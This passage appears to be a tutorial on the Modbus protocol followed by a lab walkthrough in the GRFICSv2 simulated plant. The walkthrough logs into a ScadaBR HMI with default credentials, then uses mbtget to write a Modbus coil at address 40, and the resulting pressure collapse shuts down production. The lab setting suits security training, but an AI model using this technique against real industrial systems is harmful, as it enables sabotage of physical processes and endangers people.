MODBUS
What is Modbus?
Modbus is a widely used open communication protocol that enables communication between various industrial and automation systems. It is primarily used for Programmable Logic Controllers (PLCs) and has become the de facto standard for industrial-level communication.
Modbus ensures communication between a master device (e.g., PLC, SCADA system, or computer) and one or more slave devices (e.g., sensors, actuators, or controllers). It supports communication over different mediums, including:
- Serial communication (RS-232/RS-485)
- Ethernet-based communication (Modbus TCP)
- Wireless communication networks
Its simplicity, reliability, and widespread acceptance make Modbus the preferred choice for industrial applications.
What Can Modbus Do?
Modbus allows devices in an industrial setting to communicate and exchange data efficiently. Some key functionalities include:
1. Data Read and Write:
- Modbus can read sensor values such as temperature, pressure, and flow rate.
- It can write commands to actuators, for example, turning a motor on/off.
2. Control Devices:
- Modbus allows control systems, such as PLCs or HMIs, to send commands to devices like pumps, valves, or lighting systems.
3. Monitor Processes:
- SCADA systems use Modbus to gather data from field devices.
- It helps check device statuses and warn operators of malfunctioning equipment.
4. Data Logging:
- Devices with Modbus capabilities can send process data to loggers and historians for analysis and record-keeping.
5. Interconnect Devices:
- Modbus enables interoperability between products from different vendors.
- This feature makes it useful in multi-vendor systems and relevant for IoT applications.
Tools you will need for this exercise are -
- VmWare Workstation.
- GRFICSv2 VM environment.
- Kali Linux
- Mbtget
Shutting Down Process -
Using arp-scan
So firstly, we are going to open the Wireshark and there we can see how many devices are communicating with each other.
In the below picture we can see that 192.168.90.117 and 192.168.90.5are sending the HTTP packets with TCP port 8080, so that reveals…
Now, we click the link and it will bring us to the SCADABR page as shown in the picture.
Now for the user id and password we can either use common passwords like user id – root, password – root or else we can check on google to see the credentials as shown the figure.
Now we can login to our HMI portal, and this is what we can see….
So now we are seeing in real time how changes in values affect the chemical process. We can see that the main tank is designed to stay between 2650–2750kPa.
We are monitoring the process, so let’s find ways to make changes to it, we can do that from Wireshark.
We are going to start a new capture and set the filter to modbus by typing the following in the display filter and hitting ENTER:
Here you can see that the 192.168.95.2 device which is likely a PLC keeps sending communications to 192.168.90.5 to the order of 1 Byte.
This is a single byte at address 40.
Now we are going to find the actual value there, so we are going to keep scrolling until we get the value address 40 is 0.
The fact that they keep sending this again and again suggests that it might be important! Let’s see what happens when we turn this value to 1.
We have already downloaded mbtget, so first, let’s take a look at the help page:
The bits are where we need to focus here, so let’s first read the value. So we choose -r1 because recall the function code in the prior screenshot
We are going to use the -a flag for the modbus address, which is 40, the port is the default modbus port of 502, and then finally the target IP:
Now let’s see what happens if we turn it to 1. All we have to change is the initial flag from -r1 to w5, then give it the value of 1:
Now, check our HMI again….
It’s dropped over 1000kPa in less than a minute!
Let’s see what happens here…..
It finally bottoms out at approximately 97kPa.
The production is now shut down, we got what we wanted.